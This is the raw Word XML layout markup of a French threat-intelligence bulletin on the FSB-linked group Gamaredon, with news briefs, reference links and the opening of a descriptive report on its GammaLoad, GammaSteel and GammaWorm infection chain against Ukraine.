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2719070</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7687319</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3866514" cy="167005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6514" cy="1670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66514" h="167005">
                          <a:moveTo>
                            <a:pt x="0" y="167005"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3866514" y="167005"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3866514" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="167005"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="167005"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3866514" y="167005"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="3866514" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="16700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828674</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7687319</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="1316990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3169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316990">
                          <a:moveTo>
                            <a:pt x="3175" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3175" y="1316990"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="1313815"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1313815"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="826135"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5754369" y="826135"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="498475"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5754369" y="498475"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="6350" y="170815"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5754369" y="170815"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="3175"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719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2719070</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7693669</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="1304289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304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304289">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="130428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6586220</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7687319</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="1316990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3169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316990">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="131699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1533524</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1161499</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4525722" cy="320600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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5722" cy="3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4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35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1884506</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1428005" cy="204018"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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005" cy="2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24"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Résumé de l’actualité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2213633</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5606933" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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19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5"/>
                            <w:spacing w:val="3"/>
                            <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> [Gamaredon] La matryoshka du FSB, le cadeau de Gamaredon qui ne cesse de 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2386988</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="781415" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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14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  <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve">dépaqueter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2661943</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5607568" cy="160641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7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19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5"/>
                            <w:spacing w:val="2"/>
                            <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> [UAC-0226] Une ancienne faille de WinRAR alimente les attaques contre l'Ukraine,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2835298</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3543888" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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38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  <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve">comment les logiciels non gérés laissent la porte ouverte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3381836</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1524924" cy="204018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924" cy="2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24"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Autres brèves relevées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3710963</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5607568" cy="160641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7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19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5"/>
                            <w:spacing w:val="7"/>
                            <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> Des pirates informatiques russes seraient à l'origine d'une cyberattaque de 2,5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3884318</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3931790" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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317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  <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve">milliards de dollars contre Jaguar Land Rover, selon un rapport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4159273</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5606933" cy="160641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19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5"/>
                            <w:spacing w:val="7"/>
                            <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> Le FBI met en garde : des pirates informatiques des services de renseignement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4332628</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4126718" cy="160641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67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  <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve">russes ciblent les clés de récupération des sauvegardes de Signal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4607583</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3842699" cy="160641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426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19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  <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> Rapport ESET sur l’activité des APT – T4 2025 à T1 2026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4882538</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5607568" cy="160641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7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19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5"/>
                            <w:spacing w:val="27"/>
                            <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> Rapport sur les attaques menées par des États contre les réseaux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5055893</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2570039" cy="160641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003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  <w:u w:val="single"/>
                          </w:rPr>
                          <w:t xml:space="preserve">d'approvisionnement en eau : 2024-2026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5602431</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2503873" cy="204018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3873" cy="2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24"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Règles Suricata « Emerging Threats »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5931558</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1529744" cy="160641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97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Règles modifiées : ?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6465396</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1371661" cy="204018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61" cy="2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23"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Suivi des indicateurs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6794523</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1700559" cy="160641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055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Echantillons relevés : ?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7328361</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="602498" cy="204018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98" cy="2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29"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Annexes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7663838</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="997716" cy="160641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77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002060"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Fichier intégré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2788919</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7663838</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="803629" cy="160641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2788919</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>7910853</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3023461" cy="160641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46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Données CTI issues du bulletin, au format STIX.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2788919</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8158503</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3778133" cy="160641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81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Synthèse des thèmes et des IOC collectés, sous forme d’un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2788919</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8319158</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="912733" cy="160641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7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tableau Excel.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2788919</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8486163</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3590503" cy="160641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05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Annexes associées au bulletin, sous forme d’une archive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2788919</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8646818</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3800358" cy="160641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03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ZIP ; le fichier « .txt » doit être renommé avec une extension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2788919</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>8807473</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1548876" cy="160641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88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« .zip » avant extraction.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937140" cy="131433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714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Bulletin-APT-XXX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6491605</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>10057785</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="678497" cy="131433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849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45532" cy="131433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553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XXXX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0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>6556375</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>10189230</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="613918" cy="131433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391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Juillet 2024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7974974</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1828800" cy="6350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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947310</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5747551" cy="233164"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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7551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9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">[Gamaredon] La matryoshka du FSB, le cadeau de Gamaredon qui ne cesse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1198770</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1379005" cy="233164"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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9005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de se dépaqueter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1840253</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5606933" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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16 avril 2025</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle12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: Au cœur de PteroLNK de Gamaredon : résolveurs de points de dépôt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2013608</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1563929" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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39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 infrastructure évasive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2288563</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5606933" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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</w:rPr>
                          <w:t xml:space="preserve">13 mai 2026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: GLa chaîne d’infection de Gamaredon : e-mails usurpés, GammaDrop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2461918</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1043864" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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386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 GammaLoad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2736873</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4561764" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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176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1</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle14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er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 juin 2026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Analyse de GammaPhish et GammaWorm par Sekoia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3011828</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5606933" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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1</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle14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er</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle11"/>
                            <w:spacing w:val="2"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> juin 2026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: Un ver VBScript dissimulé dans les ADS NTFS avec un résolveur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3185183</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3886124" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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61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points de dépôt C2 basé sur un service cloud contre l’Ukraine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3460138</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3384474" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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844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3 juin 2026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Analyse de GammaLoad par Sekoia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3735093</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3392094" cy="160641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20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4 juin 2026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Analyse de GammaSteel par Sekoia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4010048</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5606933" cy="160641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6"/>
                            <w:spacing w:val="1"/>
                          </w:rPr>
                          <w:t xml:space="preserve">25 juin 2026 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: Le groupe APT russe « Gamaredon » modernise son arsenal, ce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4183403</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2099869" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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98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nécessite de nouvelles défenses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4458358</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5606933" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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25 juin 2026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Gamaredon en 2025 : exploitation des tunnels, des collaborateurs,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4631713</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3086659" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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665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points de dépôt secrets et de nouvelles alliances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4906668</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5606933" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">6 juin 2026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: Des hackers du FSB russe frappent l’Ukraine avec une chaîne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5080023</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3093644" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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936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logiciels malveillants à réinstallation automatique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5629933</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1098858" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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88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Vue d’ensemble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5904888</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5607568" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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7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Victimologie : Institutions gouvernementales ukrainiennes, organisations militaires,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6078243</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5378333" cy="160641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8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infrastructures critiques, administrations publiques et réseaux d'intérêt stratégique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6251598</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="672193" cy="160641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21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ukrainiens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6526553</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5606933" cy="160641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Arsenal :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Spear phsihing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CVE-2025-8088, archives WinRAR piégées, fichiers LNK,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6699908</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4497899" cy="160641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78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GammaPhish, GammaLoad, GammaSteel, GammaWorm, GammaWipe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6974863</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5606298" cy="160641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2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Objectif principal :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Cyberespionnage de long terme au profit des intérêts russes, avec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7148218</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2320814" cy="160641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08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 ciblage quasi exclusif de l'Ukraine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8013087</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3675671" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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7567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https://harfanglab.io/insidethelab/gamaredons-pterolnk-analysis/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8159137</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4042701" cy="146037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4270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https://harfanglab.io/insidethelab/gamaredon-gammadrop-gammaload/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8305187</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5771171" cy="146037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17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https://blog.sekoia.io/fsbs-matryoshka-1-3-gamaredons-gifts-that-keeps-unpacking-gammaphish-and-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8451237</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="804328" cy="146037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32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gammaworm/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8597287</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2813976" cy="146037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397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https://intel.threadlinqs.com/threat/TL-2026-0653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8743337</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5446686" cy="146037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668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https://blog.sekoia.io/fsbs-matryoshka-2-3-gamaredons-gifts-that-keeps-unpacking-gammaload/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8889387</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5474626" cy="146037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462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6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https://blog.sekoia.io/fsbs-matryoshka-3-3-gamaredons-gifts-that-keeps-unpacking-gammasteel/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9035437</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4981231" cy="146037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123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7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https://www.darkreading.com/threat-intelligence/russia-apt-gamaredon-arsenal-defense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9181487</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5757201" cy="146037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720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8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https://www.welivesecurity.com/en/eset-research/gamaredon-2025-leveraging-tunnels-workers-dead-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9327537</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1199679" cy="146037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967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drops-new-alliances/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5185066" cy="146037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8506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9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https://www.intelfusions.com/news/gamaredon-fsb-matryoshka-gammaphish-gammaworm-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2166063" cy="146037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6063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gammaload-gammasteel-sekoia-2026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1776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1145638" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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56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Résumé exécutif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1233828</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Gamaredon est un groupe de cyberespionnage spécialisé dans les opérations d’intrusion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1407183</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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persistantes et à long terme ciblant principalement l’Ukraine. Officiellement opéré par le FSB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1580538</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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russe, ce groupe vise les réseaux gouvernementaux, militaires et les infrastructures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1753893</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2006724" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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67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critiques, et reste actif à ce jour.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2028848</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Ce rapport analyse plus d’une décennie de familles de logiciels malveillants et établit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2202203</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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taxonomie unifiée de nommage pour clarifier la nomenclature fragmentée existante.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2375558</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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chaîne d’infection conçue par Gamaredon est invisible : elle se dissimule au sein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2548913</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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fonctionnalités légitimes de Windows et abuse de plateformes de confiance comme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2722268</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Telegram, Cloudflare ou les services de stockage cloud standard, laissant ainsi peu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2895623</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2139020" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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0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traces sur les machines infectées.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3170578</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Une fois à l’intérieur d’un réseau, le logiciel malveillant se propage physiquement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3343933</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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infectant les clés USB pour contourner les systèmes isolés (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air-gap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) et vole des documents,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3517288</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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qu’ils soient stockés, en cours de transfert ou modifiés en temps réel. Chaque étape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3690643</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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chaîne d’infection fonctionne comme une porte dérobée, permettant aux opérateurs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3863998</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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d’envoyer de nouvelles commandes, de mettre à jour les configurations ou de déployer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4037353</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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charges utiles supplémentaires, garantissant ainsi un accès permanent aux machines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4210708</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="905189" cy="160641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518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compromises.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4485663</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641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L’équipe TDR de Sekoia a suivi et reconstitué l’intégralité de cette chaîne d’infection afin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4659018</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641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d’anticiper la menace, de protéger ses clients à l’échelle mondiale et de contribuer à contrer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4832373</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4941122" cy="160641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112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opérations qui ciblent directement la souveraineté des États démocratiques.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5380378</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="656568" cy="160641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Synthèse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745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930946</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1936865" cy="321282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6865" cy="32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1</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle21"/>
                            <w:spacing w:val="6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Introduction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5835533" cy="160641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L'analyse décrite dans la suite de cet article est le fruit de longues recherches par l'équipe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5834898" cy="160641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détection et de recherche des menaces (</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle17"/>
                            <w:spacing w:val="7"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Threat Detection &amp; Research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) de Sekoia.io,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1755798</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641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menées depuis le mois de décembre. En décembre, Sekoia a observé les premières étapes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1929153</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641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de l'attaque et contenaient plusieurs familles distinctes de logiciels malveillants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2102508</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641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historiquement attribuées à Gamaredon : un ver, des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loaders</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="47"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> et un </w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle17"/>
                            <w:spacing w:val="4"/>
                          </w:rPr>
                          <w:t xml:space="preserve">info stealer</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="-21"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> 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2275863</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641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communément identifiés par la communauté sous les noms de "Pteranodon", "GammaLoad"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2449218</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1143518" cy="160641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5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 "GammaSteel".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2724173</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Bien que l'équipe TDR de Sekoia a déjà modélisé plusieurs campagnes Gamaredon, le suivi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2897528</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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de cet ensemble d’intrusions spécifique présente systématiquement des défis importants.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3070883</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641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Leurs flux d’exécution sont connus pour être longs et complexes. De plus, les conventions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3244238</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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de nommage fragmentées au sein du secteur de la cybersécurité, combinées à l’itération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3417593</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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rapide des logiciels malveillants de Gamaredon, créent une confusion technique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3590948</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3863058" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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30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obscurcissent la compréhension opérationnelle de la menace.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3865903</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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Afin de démêler cette complexité et d’apporter des éclaircissements sur les capacités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4039258</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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actuelles de Gamaredon, Sekoia a décider de document de manière exhaustive sa chaîne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4212613</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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d’infection de janvier 2026, de comparer les différentes versions du logiciel malveillant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4385968</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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d’harmoniser les conventions de nommage de ce dernier en fonction de leurs propres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4559323</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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conclusions. Il faut noter qu'ici est faite une reconstitution importante mais non complète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4732678</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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la campagne à long terme de Gamaredon. Cette dernière est toujours en cours. Sekoia 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4906033</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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réussi à comprendre des étapes cruciales permettant de reproduire en temps réel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5079388</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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requêtes réseau adressées aux serveurs de commande et de contrôle de Gamaredon.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5252743</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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interaction en direct a réussi à tromper l’infrastructure de relais afin qu’elle délivre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5426098</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3544300" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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43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versions les plus récentes des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et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final.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5701053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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L'analyse détaillée du dernier arsenal d'espionnage de Gamaredon vise à documenter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5874408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
